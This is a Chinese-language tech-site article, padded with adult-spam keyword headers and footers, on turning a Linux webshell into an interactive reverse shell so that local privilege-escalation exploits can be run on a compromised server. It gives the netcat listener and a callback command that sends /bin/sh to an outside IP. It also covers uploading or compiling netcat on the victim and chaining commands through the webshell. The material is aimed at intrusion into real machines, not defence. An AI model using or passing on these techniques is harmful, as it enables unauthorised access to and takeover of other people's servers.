成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

Linux下反彈CmdLine Shell小技巧

系統(tǒng) Linux
Linux提權(quán)絕大部分都靠的是Local Exploit。WebShell一般都可以執(zhí)行命令,但是我們的EXP必須在可交互環(huán)境運(yùn)行,否則如果直接在WebShell執(zhí)行,即使能提權(quán)成功,我們也沒(méi)法利用到。

玩了半天朋友給的Linux的WebShell,本來(lái)想實(shí)踐一下UDEV提權(quán)呢,***發(fā)現(xiàn)服務(wù)器貌似已經(jīng)打過(guò)補(bǔ)丁了。

不過(guò)還是有其他的收獲的,所以我就YY下Linux反彈shell的問(wèn)題。

Linux提權(quán)絕大部分都靠的是Local Exploit。WebShell一般都可以執(zhí)行命令,但是我們的EXP必須在可交互環(huán)境運(yùn)行,否則如果直接在WebShell執(zhí)行,即使能提權(quán)成功,我們也沒(méi)法利用到。所以我們需要先反彈一個(gè)CmdLine Shell回來(lái)(直接說(shuō)成CmdShell怕人誤解...因?yàn)閃in有個(gè)cmd.exe ^_^),然后在命令行終端下執(zhí)行EXP進(jìn)行提權(quán)。

一般情況下,絕大多數(shù)人都會(huì)通過(guò)PHP WebShell的Back Connect功能彈回一個(gè)Shell,但是有時(shí)候會(huì)碰到服務(wù)器不支持PHP或者WebShell沒(méi)法反彈的情況,比如這兩天朋友給我的一個(gè)JSPShell所在服務(wù)器只支持JSP,不支持PHP。這時(shí)候,我們經(jīng)典的netcat就可以派上用場(chǎng)了。

平時(shí)在Windows下做事的時(shí)候,在必要的情況下我們可以先在本機(jī)運(yùn)行nc -vv -lp 1234監(jiān)聽端口,然后在肉雞上nc 12.21.12.21 1234 -e cmd.exe給我們反彈一個(gè)CmdShell,這個(gè)方法在Linux仍然可行。

在本機(jī)監(jiān)聽后,在WebShell運(yùn)行nc 12.21.12.21 1234 -e /bin/sh就能彈一個(gè)CmdLine Shell給我們。

但我們經(jīng)常碰到的情況并不都是這么100%順利的,像昨晚整的那兩臺(tái),每臺(tái)都是不能直接執(zhí)行nc的。一臺(tái)有nc,但執(zhí)行從是不起作用,另外一臺(tái)直接壓根就沒(méi)有nc....

不過(guò),這個(gè)難不倒我們,我們可以給他裝一個(gè)嘛,比較快捷的方法是,我們可以到http://netcat.sourceforge.net/download.php下載nc的源碼,先在我們自己linux機(jī)器上編譯好以后把bin文件傳上去(我開始傳的我的Debian自帶的netcat,結(jié)果仍然不能運(yùn)行....)。如果還不行,那就把源碼傳上去,在目標(biāo)機(jī)器上直接編譯。

昨晚那兩臺(tái)機(jī)器,一臺(tái)我是直接傳的本地編譯后的,一臺(tái)是在目標(biāo)機(jī)器上編譯的。如果直接傳的nc可以運(yùn)行的話還比較好說(shuō),如果需要在目標(biāo)機(jī)器上編譯的話,這里有點(diǎn)小技巧:

因?yàn)樵诘玫紺mdLine Shell前,我們只能在WebShell里執(zhí)行命令,一般每次只能執(zhí)行一條,然后等回顯。假如我們的WebShell在/var/www/site目錄,那么我們每次執(zhí)行命令默認(rèn)的當(dāng)前路徑都是/var/www/site,而我們的netcat源碼包解壓在了/tmp/netcatsrc文件夾,這樣的話,我們編譯netcat的時(shí)候,configure還好說(shuō),可用/tmp/netcatsrc/configure命令,但下一步make的時(shí)候就不行了,因?yàn)楫?dāng)前路徑是/var/www/site,而不是我們想要的/tmp/netcatsrc/,所以我們configure完了make的時(shí)候會(huì)報(bào)錯(cuò)。

解決這個(gè)問(wèn)題其實(shí)也很簡(jiǎn)單,可以直接把兩句寫成一句就可以:cd /tmp/netcatsrc;make

用分號(hào)隔開寫,把make跟在目錄切換命令后面,這樣編譯的時(shí)候就不會(huì)報(bào)錯(cuò)了。(流浪貓教的..^_^)

在還沒(méi)有得到CmdLine Shell的時(shí)候,這樣的寫法還是很有用的。

【編輯推薦】

  1. 實(shí)用技巧:找回Linux Root口令三種方法
  2. Linux下處理圖像的法寶GIMP的安裝
  3. Linux中防御垃圾郵件的方法
責(zé)任編輯:趙寧寧 來(lái)源: 中國(guó)IT實(shí)驗(yàn)室
相關(guān)推薦

2009-07-19 10:48:53

LinuxWebShell反彈CmdLine She

2010-11-02 21:17:17

2018-06-18 10:33:39

Linux內(nèi)網(wǎng)技巧

2019-12-04 12:28:24

TOP命令Linux

2017-09-04 16:20:38

Linuxshell命令

2020-03-18 14:20:25

shellLinux命令

2021-12-16 10:53:23

shell命令腳本

2011-02-25 14:10:52

Proftpd技巧

2013-12-02 09:49:59

2011-05-27 10:02:42

Shell

2021-06-07 23:51:16

MacGo服務(wù)

2009-07-15 09:09:45

Vim編輯器使用Vim備份

2009-06-19 13:32:40

Java開啟OpenGL

2015-03-06 15:43:39

2024-03-11 15:08:26

Linux操作系統(tǒng)進(jìn)程

2009-12-03 10:07:55

Linuxman命令使用技巧

2009-10-09 14:45:00

ccna小技巧ccna

2014-07-31 11:24:21

Linuxshell命令

2019-08-14 08:03:49

LinuxShell腳本web服務(wù)

2022-02-17 13:58:38

Linux技巧文件
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)

主站蜘蛛池模板: 成人在线视 | 国产欧美一区二区三区在线播放 | 人妖一区 | 欧美影院| 欧美黄色网 | 欧美日韩在线一区二区三区 | 精精国产xxxx视频在线播放 | 国产成人综合一区二区三区 | 国产成人精品一区二区三区四区 | 精品国产亚洲一区二区三区大结局 | 在线亚洲人成电影网站色www | 婷婷久久综合 | 天堂视频一区 | 美女天天干天天操 | 91正在播放| 日韩精品亚洲专区在线观看 | 91se在线 | 成人精品在线视频 | 国产乱码精品一区二区三区中文 | 一区二区三区亚洲 | 国产欧美在线观看 | 欧美日韩中文在线 | 亚洲成人av| 一区二区三区欧美 | 久久久久国产精品一区三寸 | 久久久免费 | 国产一级在线观看 | 日韩一区二区三区在线观看视频 | 久久久激情 | 久久99精品久久久久久 | 亚洲视频中文字幕 | 成人在线激情 | 亚洲精品日日夜夜 | 91中文字幕在线观看 | 一区二区三区成人 | 在线视频中文字幕 | 免费观看羞羞视频网站 | 91麻豆精品一区二区三区 | 一级看片免费视频 | 特黄特黄a级毛片免费专区 av网站免费在线观看 | 午夜免费网 |